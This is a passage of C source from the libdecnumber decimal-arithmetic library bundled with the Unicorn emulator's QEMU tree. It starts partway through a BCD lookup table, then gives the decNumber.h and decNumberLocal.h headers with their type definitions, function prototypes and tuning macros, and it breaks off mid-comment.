4,1,3,3, 4,1,4,3, 4,1,5,3, 4,1,6,3, 4,1,7,3, 4,1,8,3, 4,1,9,3, 4,2,0,3, 4,2,1,3, 4,2,2,3, 4,2,3,3, 4,2,4,3, 4,2,5,3, 4,2,6,3, 4,2,7,3, 4,2,8,3, 4,2,9,3, 4,3,0,3, 4,3,1,3, 4,3,2,3, 4,3,3,3, 4,3,4,3, 4,3,5,3, 4,3,6,3, 4,3,7,3, 4,3,8,3, 4,3,9,3, 4,4,0,3, 4,4,1,3, 4,4,2,3, 4,4,3,3, 4,4,4,3, 4,4,5,3, 4,4,6,3, 4,4,7,3, 4,4,8,3, 4,4,9,3, 4,5,0,3, 4,5,1,3, 4,5,2,3, 4,5,3,3, 4,5,4,3, 4,5,5,3, 4,5,6,3, 4,5,7,3, 4,5,8,3, 4,5,9,3, 4,6,0,3, 4,6,1,3, 4,6,2,3, 4,6,3,3, 4,6,4,3, 4,6,5,3, 4,6,6,3, 4,6,7,3, 4,6,8,3, 4,6,9,3, 4,7,0,3, 4,7,1,3, 4,7,2,3, 4,7,3,3, 4,7,4,3, 4,7,5,3, 4,7,6,3, 4,7,7,3, 4,7,8,3, 4,7,9,3, 4,8,0,3, 4,8,1,3, 4,8,2,3, 4,8,3,3, 4,8,4,3, 4,8,5,3, 4,8,6,3, 4,8,7,3, 4,8,8,3, 4,8,9,3, 4,9,0,3, 4,9,1,3, 4,9,2,3, 4,9,3,3, 4,9,4,3, 4,9,5,3, 4,9,6,3, 4,9,7,3, 4,9,8,3, 4,9,9,3, 5,0,0,3, 5,0,1,3, 5,0,2,3, 5,0,3,3, 5,0,4,3, 5,0,5,3, 5,0,6,3, 5,0,7,3, 5,0,8,3, 5,0,9,3, 5,1,0,3, 5,1,1,3, 5,1,2,3, 5,1,3,3, 5,1,4,3, 5,1,5,3, 5,1,6,3, 5,1,7,3, 5,1,8,3, 5,1,9,3, 5,2,0,3, 5,2,1,3, 5,2,2,3, 5,2,3,3, 5,2,4,3, 5,2,5,3, 5,2,6,3, 5,2,7,3, 5,2,8,3, 5,2,9,3, 5,3,0,3, 5,3,1,3, 5,3,2,3, 5,3,3,3, 5,3,4,3, 5,3,5,3, 5,3,6,3, 5,3,7,3, 5,3,8,3, 5,3,9,3, 5,4,0,3, 5,4,1,3, 5,4,2,3, 5,4,3,3, 5,4,4,3, 5,4,5,3, 5,4,6,3, 5,4,7,3, 5,4,8,3, 5,4,9,3, 5,5,0,3, 5,5,1,3, 5,5,2,3, 5,5,3,3, 5,5,4,3, 5,5,5,3, 5,5,6,3, 5,5,7,3, 5,5,8,3, 5,5,9,3, 5,6,0,3, 5,6,1,3, 5,6,2,3, 5,6,3,3, 5,6,4,3, 5,6,5,3, 5,6,6,3, 5,6,7,3, 5,6,8,3, 5,6,9,3, 5,7,0,3, 5,7,1,3, 5,7,2,3, 5,7,3,3, 5,7,4,3, 5,7,5,3, 5,7,6,3, 5,7,7,3, 5,7,8,3, 5,7,9,3, 5,8,0,3, 5,8,1,3, 5,8,2,3, 5,8,3,3, 5,8,4,3, 5,8,5,3, 5,8,6,3, 5,8,7,3, 5,8,8,3, 5,8,9,3, 5,9,0,3, 5,9,1,3, 5,9,2,3, 5,9,3,3, 5,9,4,3, 5,9,5,3, 5,9,6,3, 5,9,7,3, 5,9,8,3, 5,9,9,3, 6,0,0,3, 6,0,1,3, 6,0,2,3, 6,0,3,3, 6,0,4,3, 6,0,5,3, 6,0,6,3, 6,0,7,3, 6,0,8,3, 6,0,9,3, 6,1,0,3, 6,1,1,3, 6,1,2,3, 6,1,3,3, 6,1,4,3, 6,1,5,3, 6,1,6,3, 6,1,7,3, 6,1,8,3, 6,1,9,3, 6,2,0,3, 
6,2,1,3, 6,2,2,3, 6,2,3,3, 6,2,4,3, 6,2,5,3, 6,2,6,3, 6,2,7,3, 6,2,8,3, 6,2,9,3, 6,3,0,3, 6,3,1,3, 6,3,2,3, 6,3,3,3, 6,3,4,3, 6,3,5,3, 6,3,6,3, 6,3,7,3, 6,3,8,3, 6,3,9,3, 6,4,0,3, 6,4,1,3, 6,4,2,3, 6,4,3,3, 6,4,4,3, 6,4,5,3, 6,4,6,3, 6,4,7,3, 6,4,8,3, 6,4,9,3, 6,5,0,3, 6,5,1,3, 6,5,2,3, 6,5,3,3, 6,5,4,3, 6,5,5,3, 6,5,6,3, 6,5,7,3, 6,5,8,3, 6,5,9,3, 6,6,0,3, 6,6,1,3, 6,6,2,3, 6,6,3,3, 6,6,4,3, 6,6,5,3, 6,6,6,3, 6,6,7,3, 6,6,8,3, 6,6,9,3, 6,7,0,3, 6,7,1,3, 6,7,2,3, 6,7,3,3, 6,7,4,3, 6,7,5,3, 6,7,6,3, 6,7,7,3, 6,7,8,3, 6,7,9,3, 6,8,0,3, 6,8,1,3, 6,8,2,3, 6,8,3,3, 6,8,4,3, 6,8,5,3, 6,8,6,3, 6,8,7,3, 6,8,8,3, 6,8,9,3, 6,9,0,3, 6,9,1,3, 6,9,2,3, 6,9,3,3, 6,9,4,3, 6,9,5,3, 6,9,6,3, 6,9,7,3, 6,9,8,3, 6,9,9,3, 7,0,0,3, 7,0,1,3, 7,0,2,3, 7,0,3,3, 7,0,4,3, 7,0,5,3, 7,0,6,3, 7,0,7,3, 7,0,8,3, 7,0,9,3, 7,1,0,3, 7,1,1,3, 7,1,2,3, 7,1,3,3, 7,1,4,3, 7,1,5,3, 7,1,6,3, 7,1,7,3, 7,1,8,3, 7,1,9,3, 7,2,0,3, 7,2,1,3, 7,2,2,3, 7,2,3,3, 7,2,4,3, 7,2,5,3, 7,2,6,3, 7,2,7,3, 7,2,8,3, 7,2,9,3, 7,3,0,3, 7,3,1,3, 7,3,2,3, 7,3,3,3, 7,3,4,3, 7,3,5,3, 7,3,6,3, 7,3,7,3, 7,3,8,3, 7,3,9,3, 7,4,0,3, 7,4,1,3, 7,4,2,3, 7,4,3,3, 7,4,4,3, 7,4,5,3, 7,4,6,3, 7,4,7,3, 7,4,8,3, 7,4,9,3, 7,5,0,3, 7,5,1,3, 7,5,2,3, 7,5,3,3, 7,5,4,3, 7,5,5,3, 7,5,6,3, 7,5,7,3, 7,5,8,3, 7,5,9,3, 7,6,0,3, 7,6,1,3, 7,6,2,3, 7,6,3,3, 7,6,4,3, 7,6,5,3, 7,6,6,3, 7,6,7,3, 7,6,8,3, 7,6,9,3, 7,7,0,3, 7,7,1,3, 7,7,2,3, 7,7,3,3, 7,7,4,3, 7,7,5,3, 7,7,6,3, 7,7,7,3, 7,7,8,3, 7,7,9,3, 7,8,0,3, 7,8,1,3, 7,8,2,3, 7,8,3,3, 7,8,4,3, 7,8,5,3, 7,8,6,3, 7,8,7,3, 7,8,8,3, 7,8,9,3, 7,9,0,3, 7,9,1,3, 7,9,2,3, 7,9,3,3, 7,9,4,3, 7,9,5,3, 7,9,6,3, 7,9,7,3, 7,9,8,3, 7,9,9,3, 8,0,0,3, 8,0,1,3, 8,0,2,3, 8,0,3,3, 8,0,4,3, 8,0,5,3, 8,0,6,3, 8,0,7,3, 8,0,8,3, 8,0,9,3, 8,1,0,3, 8,1,1,3, 8,1,2,3, 8,1,3,3, 8,1,4,3, 8,1,5,3, 8,1,6,3, 8,1,7,3, 8,1,8,3, 8,1,9,3, 8,2,0,3, 8,2,1,3, 8,2,2,3, 8,2,3,3, 8,2,4,3, 8,2,5,3, 8,2,6,3, 8,2,7,3, 8,2,8,3, 8,2,9,3, 8,3,0,3, 8,3,1,3, 8,3,2,3, 8,3,3,3, 8,3,4,3, 8,3,5,3, 8,3,6,3, 8,3,7,3, 8,3,8,3, 8,3,9,3, 8,4,0,3, 8,4,1,3, 8,4,2,3, 8,4,3,3, 8,4,4,3, 8,4,5,3, 8,4,6,3, 8,4,7,3, 8,4,8,3, 8,4,9,3, 8,5,0,3, 8,5,1,3, 8,5,2,3, 8,5,3,3, 8,5,4,3, 8,5,5,3, 8,5,6,3, 8,5,7,3, 8,5,8,3, 8,5,9,3, 8,6,0,3, 8,6,1,3, 8,6,2,3, 8,6,3,3, 8,6,4,3, 8,6,5,3, 8,6,6,3, 8,6,7,3, 8,6,8,3, 8,6,9,3, 8,7,0,3, 8,7,1,3, 8,7,2,3, 8,7,3,3, 8,7,4,3, 8,7,5,3, 8,7,6,3, 8,7,7,3, 8,7,8,3, 8,7,9,3, 8,8,0,3, 8,8,1,3, 8,8,2,3, 8,8,3,3, 8,8,4,3, 8,8,5,3, 8,8,6,3, 8,8,7,3, 8,8,8,3, 8,8,9,3, 8,9,0,3, 8,9,1,3, 8,9,2,3, 8,9,3,3, 8,9,4,3, 8,9,5,3, 8,9,6,3, 8,9,7,3, 8,9,8,3, 8,9,9,3, 9,0,0,3, 9,0,1,3, 9,0,2,3, 9,0,3,3, 9,0,4,3, 9,0,5,3, 9,0,6,3, 9,0,7,3, 9,0,8,3, 9,0,9,3, 9,1,0,3, 9,1,1,3, 9,1,2,3, 9,1,3,3, 9,1,4,3, 9,1,5,3, 9,1,6,3, 9,1,7,3, 9,1,8,3, 9,1,9,3, 9,2,0,3, 9,2,1,3, 9,2,2,3, 9,2,3,3, 9,2,4,3, 9,2,5,3, 9,2,6,3, 9,2,7,3, 9,2,8,3, 9,2,9,3, 9,3,0,3, 9,3,1,3, 9,3,2,3, 9,3,3,3, 9,3,4,3, 9,3,5,3, 9,3,6,3, 9,3,7,3, 9,3,8,3, 9,3,9,3, 9,4,0,3, 9,4,1,3, 9,4,2,3, 9,4,3,3, 9,4,4,3, 9,4,5,3, 9,4,6,3, 9,4,7,3, 9,4,8,3, 9,4,9,3, 9,5,0,3, 9,5,1,3, 9,5,2,3, 9,5,3,3, 9,5,4,3, 9,5,5,3, 9,5,6,3, 9,5,7,3, 9,5,8,3, 9,5,9,3, 9,6,0,3, 9,6,1,3, 9,6,2,3, 9,6,3,3, 9,6,4,3, 9,6,5,3, 9,6,6,3, 9,6,7,3, 9,6,8,3, 9,6,9,3, 9,7,0,3, 9,7,1,3, 9,7,2,3, 9,7,3,3, 9,7,4,3, 9,7,5,3, 9,7,6,3, 9,7,7,3, 9,7,8,3, 9,7,9,3, 9,8,0,3, 9,8,1,3, 9,8,2,3, 9,8,3,3, 9,8,4,3, 9,8,5,3, 9,8,6,3, 9,8,7,3, 9,8,8,3, 9,8,9,3, 9,9,0,3, 9,9,1,3, 9,9,2,3, 9,9,3,3, 9,9,4,3, 9,9,5,3, 9,9,6,3, 9,9,7,3, 9,9,8,3, 9,9,9,3}; #endif 
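/* Each entry in the DPD2BCD8 and BIN2BCD8 tables above occupies four */
/* bytes: three BCD digits (most significant first) followed by the   */
/* count of significant digits.  A minimal usage sketch follows; it   */
/* is guarded out so the generated data are unchanged when compiled,  */
/* and the helper names and stdio calls are illustrative assumptions, */
/* not part of the library.                                           */
#if 0 /* illustrative example only -- remove the guard to compile */
#include <stdio.h>
#include <stdint.h>

extern const uint8_t DPD2BCD8[4096]; /* declet -> 3 BCD digits + length */
extern const uint8_t BIN2BCD8[4000]; /* 0-999  -> 3 BCD digits + length */

/* Decode one 10-bit declet to its three decimal digits. */
static void show_declet(unsigned declet)
{
    const uint8_t *e = &DPD2BCD8[(declet & 0x3ff) * 4];
    /* e[0]..e[2] are the digits, e[3] the significant-digit count; */
    /* per the table above, declet 0x3ff maps to 9,9,9 (length 3).  */
    printf("DPD 0x%03x -> %d%d%d (len %d)\n",
           declet, e[0], e[1], e[2], e[3]);
}

/* Split a binary value 0-999 into its three decimal digits. */
static void show_bin(unsigned value)
{
    const uint8_t *e = &BIN2BCD8[value * 4]; /* value must be 0-999 */
    printf("%u -> %d%d%d (len %d)\n", value, e[0], e[1], e[2], e[3]);
}
#endif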
/* ------------------------------------------------------------------ */
/* File: unicorn-2.1.1/qemu/include/libdecnumber/decNumber.h           */
/* ------------------------------------------------------------------ */

/* Decimal number arithmetic module header for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.

   In addition to the permissions in the GNU General Public License,
   the Free Software Foundation gives you unlimited permission to link
   the compiled version of this file into combinations with other
   programs, and to distribute those combinations without any
   restriction coming from the use of this file.  (The General Public
   License restrictions do apply in other respects; for example, they
   cover modification of the file, and distribution when not linked
   into a combine executable.)

   GCC is distributed in the hope that it will be useful, but WITHOUT
   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
   or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public
   License for more details.

   You should have received a copy of the GNU General Public License
   along with GCC; see the file COPYING.  If not, write to the Free
   Software Foundation, 51 Franklin Street, Fifth Floor, Boston,
   MA 02110-1301, USA.  */

/* ------------------------------------------------------------------ */
/* Decimal Number arithmetic module header                             */
/* ------------------------------------------------------------------ */

#ifndef DECNUMBER_H
#define DECNUMBER_H

#define DECNAME     "decNumber"              /* Short name   */
#define DECFULLNAME "Decimal Number Module"  /* Verbose name */
#define DECAUTHOR   "Mike Cowlishaw"         /* Who to blame */

#include "libdecnumber/decContext.h"

/* Bit settings for decNumber.bits */
#define DECNEG  0x80  /* Sign; 1=negative, 0=positive or zero */
#define DECINF  0x40  /* 1=Infinity */
#define DECNAN  0x20  /* 1=NaN */
#define DECSNAN 0x10  /* 1=sNaN */
/* The remaining bits are reserved; they must be 0 */
#define DECSPECIAL (DECINF|DECNAN|DECSNAN) /* any special value */

/* Define the decNumber data structure.  The size and shape of the */
/* units array in the structure is determined by the following     */
/* constant.  This must not be changed without recompiling the     */
/* decNumber library modules.                                      */

#define DECDPUN 3  /* DECimal Digits Per UNit [must be >0  */
                   /* and <10; 3 or powers of 2 are best]. */

/* DECNUMDIGITS is the default number of digits that can be held in */
/* the structure.
If undefined, 1 is assumed and it is assumed */ /* that the structure will be immediately followed by extra space, */ /* as required. DECNUMDIGITS is always >0. */ #if !defined(DECNUMDIGITS) #define DECNUMDIGITS 1 #endif /* The size (integer data type) of each unit is determined by the */ /* number of digits it will hold. */ #if DECDPUN<=2 #define decNumberUnit uint8_t #elif DECDPUN<=4 #define decNumberUnit uint16_t #else #define decNumberUnit uint32_t #endif /* The number of units needed is ceil(DECNUMDIGITS/DECDPUN) */ #define DECNUMUNITS ((DECNUMDIGITS+DECDPUN-1)/DECDPUN) /* The data structure... */ typedef struct { int32_t digits; /* Count of digits in the coefficient; >0 */ int32_t exponent; /* Unadjusted exponent, unbiased, in */ /* range: -1999999997 through 999999999 */ uint8_t bits; /* Indicator bits (see above) */ /* Coefficient, from least significant unit */ decNumberUnit lsu[DECNUMUNITS]; } decNumber; /* Notes: */ /* 1. If digits is > DECDPUN then there will one or more */ /* decNumberUnits immediately following the first element of lsu.*/ /* These contain the remaining (more significant) digits of the */ /* number, and may be in the lsu array, or may be guaranteed by */ /* some other mechanism (such as being contained in another */ /* structure, or being overlaid on dynamically allocated */ /* storage). */ /* */ /* Each integer of the coefficient (except potentially the last) */ /* contains DECDPUN digits (e.g., a value in the range 0 through */ /* 99999999 if DECDPUN is 8, or 0 through 999 if DECDPUN is 3). */ /* */ /* 2. A decNumber converted to a string may need up to digits+14 */ /* characters. The worst cases (non-exponential and exponential */ /* formats) are -0.00000{9...}# and -9.{9...}E+999999999# */ /* (where # is '\0') */ /* ---------------------------------------------------------------- */ /* decNumber public functions and macros */ /* ---------------------------------------------------------------- */ /* Conversions */ decNumber * decNumberFromInt32(decNumber *, int32_t); decNumber * decNumberFromUInt32(decNumber *, uint32_t); decNumber *decNumberFromInt64(decNumber *, int64_t); decNumber *decNumberFromUInt64(decNumber *, uint64_t); decNumber * decNumberFromString(decNumber *, const char *, decContext *); char * decNumberToString(const decNumber *, char *); char * decNumberToEngString(const decNumber *, char *); uint32_t decNumberToUInt32(const decNumber *, decContext *); int32_t decNumberToInt32(const decNumber *, decContext *); int64_t decNumberIntegralToInt64(const decNumber *dn, decContext *set); uint8_t * decNumberGetBCD(const decNumber *, uint8_t *); decNumber * decNumberSetBCD(decNumber *, const uint8_t *, uint32_t); /* Operators and elementary functions */ decNumber * decNumberAbs(decNumber *, const decNumber *, decContext *); decNumber * decNumberAdd(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberAnd(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompare(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareSignal(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareTotal(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberCompareTotalMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberDivide(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberDivideInteger(decNumber *, const decNumber *, 
const decNumber *, decContext *); decNumber * decNumberExp(decNumber *, const decNumber *, decContext *); decNumber * decNumberFMA(decNumber *, const decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberInvert(decNumber *, const decNumber *, decContext *); decNumber * decNumberLn(decNumber *, const decNumber *, decContext *); decNumber * decNumberLogB(decNumber *, const decNumber *, decContext *); decNumber * decNumberLog10(decNumber *, const decNumber *, decContext *); decNumber * decNumberMax(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMaxMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMin(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMinMag(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberMinus(decNumber *, const decNumber *, decContext *); decNumber * decNumberMultiply(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberNormalize(decNumber *, const decNumber *, decContext *); decNumber * decNumberOr(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberPlus(decNumber *, const decNumber *, decContext *); decNumber * decNumberPower(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberQuantize(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberReduce(decNumber *, const decNumber *, decContext *); decNumber * decNumberRemainder(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRemainderNear(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRescale(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberRotate(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberSameQuantum(decNumber *, const decNumber *, const decNumber *); decNumber * decNumberScaleB(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberShift(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberSquareRoot(decNumber *, const decNumber *, decContext *); decNumber * decNumberSubtract(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberToIntegralExact(decNumber *, const decNumber *, decContext *); decNumber * decNumberToIntegralValue(decNumber *, const decNumber *, decContext *); decNumber * decNumberXor(decNumber *, const decNumber *, const decNumber *, decContext *); /* Utilities */ enum decClass decNumberClass(const decNumber *, decContext *); const char * decNumberClassToString(enum decClass); decNumber * decNumberCopy(decNumber *, const decNumber *); decNumber * decNumberCopyAbs(decNumber *, const decNumber *); decNumber * decNumberCopyNegate(decNumber *, const decNumber *); decNumber * decNumberCopySign(decNumber *, const decNumber *, const decNumber *); decNumber * decNumberNextMinus(decNumber *, const decNumber *, decContext *); decNumber * decNumberNextPlus(decNumber *, const decNumber *, decContext *); decNumber * decNumberNextToward(decNumber *, const decNumber *, const decNumber *, decContext *); decNumber * decNumberTrim(decNumber *); const char * decNumberVersion(void); decNumber * decNumberZero(decNumber *); /* Functions for testing decNumbers (normality depends on context) */ int32_t decNumberIsNormal(const decNumber *, decContext *); int32_t 
decNumberIsSubnormal(const decNumber *, decContext *);

/* Macros for testing decNumber *dn */
#define decNumberIsCanonical(dn) (1) /* All decNumbers are saintly */
#define decNumberIsFinite(dn)    (((dn)->bits&DECSPECIAL)==0)
#define decNumberIsInfinite(dn)  (((dn)->bits&DECINF)!=0)
#define decNumberIsNaN(dn)       (((dn)->bits&(DECNAN|DECSNAN))!=0)
#define decNumberIsNegative(dn)  (((dn)->bits&DECNEG)!=0)
#define decNumberIsQNaN(dn)      (((dn)->bits&(DECNAN))!=0)
#define decNumberIsSNaN(dn)      (((dn)->bits&(DECSNAN))!=0)
#define decNumberIsSpecial(dn)   (((dn)->bits&DECSPECIAL)!=0)
#define decNumberIsZero(dn)      (*(dn)->lsu==0 \
                                  && (dn)->digits==1 \
                                  && (((dn)->bits&DECSPECIAL)==0))
#define decNumberRadix(dn)       (10)

#endif

/* ------------------------------------------------------------------ */
/* File: unicorn-2.1.1/qemu/include/libdecnumber/decNumberLocal.h      */
/* ------------------------------------------------------------------ */

/* Local definitions for the decNumber C Library.
   Copyright (C) 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.

   GCC is free software; you can redistribute it and/or modify it under
   the terms of the GNU General Public License as published by the Free
   Software Foundation; either version 2, or (at your option) any later
   version.

   In addition to the permissions in the GNU General Public License,
   the Free Software Foundation gives you unlimited permission to link
   the compiled version of this file into combinations with other
   programs, and to distribute those combinations without any
   restriction coming from the use of this file.  (The General Public
   License restrictions do apply in other respects; for example, they
   cover modification of the file, and distribution when not linked
   into a combine executable.)

   GCC is distributed in the hope that it will be useful, but WITHOUT
   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
   or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public
   License for more details.

   You should have received a copy of the GNU General Public License
   along with GCC; see the file COPYING.  If not, write to the Free
   Software Foundation, 51 Franklin Street, Fifth Floor, Boston,
   MA 02110-1301, USA.  */

/* ------------------------------------------------------------------ */
/* decNumber package local type, tuning, and macro definitions         */
/* ------------------------------------------------------------------ */
/* This header file is included by all modules in the decNumber        */
/* library, and contains local type definitions, tuning parameters,    */
/* etc.  It should not need to be used by application programs.        */
/* decNumber.h or one of decDouble (etc.) must be included first.      */
/* ------------------------------------------------------------------ */

#ifndef DECNUMBERLOCAL_H
#define DECNUMBERLOCAL_H

#define DECVERSION "decNumber 3.53" /* Package Version [16 max.]
*/ #define DECNLAUTHOR "Mike Cowlishaw" /* Who to blame */ #include "libdecnumber/dconfig.h" #include "libdecnumber/decContext.h" /* Conditional code flag -- set this to match hardware platform */ /* 1=little-endian, 0=big-endian */ #if WORDS_BIGENDIAN #define DECLITEND 0 #else #define DECLITEND 1 #endif /* Conditional code flag -- set this to 1 for best performance */ #define DECUSE64 1 /* 1=use int64s, 0=int32 & smaller only */ /* Conditional check flags -- set these to 0 for best performance */ #define DECCHECK 0 /* 1 to enable robust checking */ #define DECALLOC 0 /* 1 to enable memory accounting */ #define DECTRACE 0 /* 1 to trace certain internals, etc. */ /* Tuning parameter for decNumber (arbitrary precision) module */ #define DECBUFFER 36 /* Size basis for local buffers. This */ /* should be a common maximum precision */ /* rounded up to a multiple of 4; must */ /* be zero or positive. */ /* ---------------------------------------------------------------- */ /* Definitions for all modules (general-purpose) */ /* ---------------------------------------------------------------- */ /* Local names for common types -- for safety, decNumber modules do */ /* not use int or long directly. */ #define Flag uint8_t #define Byte int8_t #define uByte uint8_t #define Short int16_t #define uShort uint16_t #define Int int32_t #define uInt uint32_t #define Unit decNumberUnit #if DECUSE64 #define Long int64_t #define uLong uint64_t #endif /* Development-use definitions */ typedef long int LI; /* for printf arguments only */ #define DECNOINT 0 /* 1 to check no internal use of 'int' */ #if DECNOINT /* if these interfere with your C includes, do not set DECNOINT */ #define int ? /* enable to ensure that plain C 'int' */ #define long ?? /* .. or 'long' types are not used */ #endif /* Shared lookup tables */ extern const uByte DECSTICKYTAB[10]; /* re-round digits if sticky */ extern const uLong DECPOWERS[19]; /* powers of ten table */ /* The following are included from decDPD.h */ extern const uShort DPD2BIN[1024]; /* DPD -> 0-999 */ extern const uShort BIN2DPD[1000]; /* 0-999 -> DPD */ extern const uInt DPD2BINK[1024]; /* DPD -> 0-999000 */ extern const uInt DPD2BINM[1024]; /* DPD -> 0-999000000 */ extern const uByte DPD2BCD8[4096]; /* DPD -> ddd + len */ extern const uByte BIN2BCD8[4000]; /* 0-999 -> ddd + len */ extern const uShort BCD2DPD[2458]; /* 0-0x999 -> DPD (0x999=2457)*/ /* LONGMUL32HI -- set w=(u*v)>>32, where w, u, and v are uInts */ /* (that is, sets w to be the high-order word of the 64-bit result; */ /* the low-order word is simply u*v.) */ /* This version is derived from Knuth via Hacker's Delight; */ /* it seems to optimize better than some others tried */ #define LONGMUL32HI(w, u, v) { \ uInt u0, u1, v0, v1, w0, w1, w2, t; \ u0=u & 0xffff; u1=u>>16; \ v0=v & 0xffff; v1=v>>16; \ w0=u0*v0; \ t=u1*v0 + (w0>>16); \ w1=t & 0xffff; w2=t>>16; \ w1=u0*v1 + w1; \ (w)=u1*v1 + w2 + (w1>>16);} /* ROUNDUP -- round an integer up to a multiple of n */ #define ROUNDUP(i, n) ((((i)+(n)-1)/n)*n) /* ROUNDDOWN -- round an integer down to a multiple of n */ #define ROUNDDOWN(i, n) (((i)/n)*n) #define ROUNDDOWN4(i) ((i)&~3) /* special for n=4 */ /* References to multi-byte sequences under different sizes */ /* Refer to a uInt from four bytes starting at a char* or uByte*, */ /* etc. 
*/ #define UINTAT(b) (*((uInt *)(b))) #define USHORTAT(b) (*((uShort *)(b))) #define UBYTEAT(b) (*((uByte *)(b))) /* X10 and X100 -- multiply integer i by 10 or 100 */ /* [shifts are usually faster than multiply; could be conditional] */ #define X10(i) (((i)<<1)+((i)<<3)) #define X100(i) (((i)<<2)+((i)<<5)+((i)<<6)) /* MAXI and MINI -- general max & min (not in ANSI) for integers */ #define MAXI(x,y) ((x)<(y)?(y):(x)) #define MINI(x,y) ((x)>(y)?(y):(x)) /* Useful constants */ #define BILLION 1000000000 /* 10**9 */ /* CHARMASK: 0x30303030 for ASCII/UTF8; 0xF0F0F0F0 for EBCDIC */ #define CHARMASK ((((((((uInt)'0')<<8)+'0')<<8)+'0')<<8)+'0') /* ---------------------------------------------------------------- */ /* Definitions for arbitrary-precision modules (only valid after */ /* decNumber.h has been included) */ /* ---------------------------------------------------------------- */ /* Limits and constants */ #define DECNUMMAXP 999999999 /* maximum precision code can handle */ #define DECNUMMAXE 999999999 /* maximum adjusted exponent ditto */ #define DECNUMMINE -999999999 /* minimum adjusted exponent ditto */ #if (DECNUMMAXP != DEC_MAX_DIGITS) #error Maximum digits mismatch #endif #if (DECNUMMAXE != DEC_MAX_EMAX) #error Maximum exponent mismatch #endif #if (DECNUMMINE != DEC_MIN_EMIN) #error Minimum exponent mismatch #endif /* Set DECDPUNMAX -- the maximum integer that fits in DECDPUN */ /* digits, and D2UTABLE -- the initializer for the D2U table */ #if DECDPUN==1 #define DECDPUNMAX 9 #define D2UTABLE {0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, \ 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, \ 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, \ 48,49} #elif DECDPUN==2 #define DECDPUNMAX 99 #define D2UTABLE {0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10, \ 11,11,12,12,13,13,14,14,15,15,16,16,17,17,18, \ 18,19,19,20,20,21,21,22,22,23,23,24,24,25} #elif DECDPUN==3 #define DECDPUNMAX 999 #define D2UTABLE {0,1,1,1,2,2,2,3,3,3,4,4,4,5,5,5,6,6,6,7,7,7, \ 8,8,8,9,9,9,10,10,10,11,11,11,12,12,12,13,13, \ 13,14,14,14,15,15,15,16,16,16,17} #elif DECDPUN==4 #define DECDPUNMAX 9999 #define D2UTABLE {0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,6, \ 6,6,6,7,7,7,7,8,8,8,8,9,9,9,9,10,10,10,10,11, \ 11,11,11,12,12,12,12,13} #elif DECDPUN==5 #define DECDPUNMAX 99999 #define D2UTABLE {0,1,1,1,1,1,2,2,2,2,2,3,3,3,3,3,4,4,4,4,4,5, \ 5,5,5,5,6,6,6,6,6,7,7,7,7,7,8,8,8,8,8,9,9,9, \ 9,9,10,10,10,10} #elif DECDPUN==6 #define DECDPUNMAX 999999 #define D2UTABLE {0,1,1,1,1,1,1,2,2,2,2,2,2,3,3,3,3,3,3,4,4,4, \ 4,4,4,5,5,5,5,5,5,6,6,6,6,6,6,7,7,7,7,7,7,8, \ 8,8,8,8,8,9} #elif DECDPUN==7 #define DECDPUNMAX 9999999 #define D2UTABLE {0,1,1,1,1,1,1,1,2,2,2,2,2,2,2,3,3,3,3,3,3,3, \ 4,4,4,4,4,4,4,5,5,5,5,5,5,5,6,6,6,6,6,6,6,7, \ 7,7,7,7,7,7} #elif DECDPUN==8 #define DECDPUNMAX 99999999 #define D2UTABLE {0,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,3,3,3,3,3, \ 3,3,3,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5,5,6,6,6, \ 6,6,6,6,6,7} #elif DECDPUN==9 #define DECDPUNMAX 999999999 #define D2UTABLE {0,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,3,3,3, \ 3,3,3,3,3,3,4,4,4,4,4,4,4,4,4,5,5,5,5,5,5,5, \ 5,5,6,6,6,6} #elif defined(DECDPUN) #error DECDPUN must be in the range 1-9 #endif /* ----- Shared data (in decNumber.c) ----- */ /* Public lookup table used by the D2U macro (see below) */ #define DECMAXD2U 49 extern const uByte d2utable[DECMAXD2U+1]; /* ----- Macros ----- */ /* ISZERO -- return true if decNumber dn is a zero */ /* [performance-critical in some situations] */ #define ISZERO(dn) decNumberIsZero(dn) /* now just a local name */ /* D2U -- return the number of 
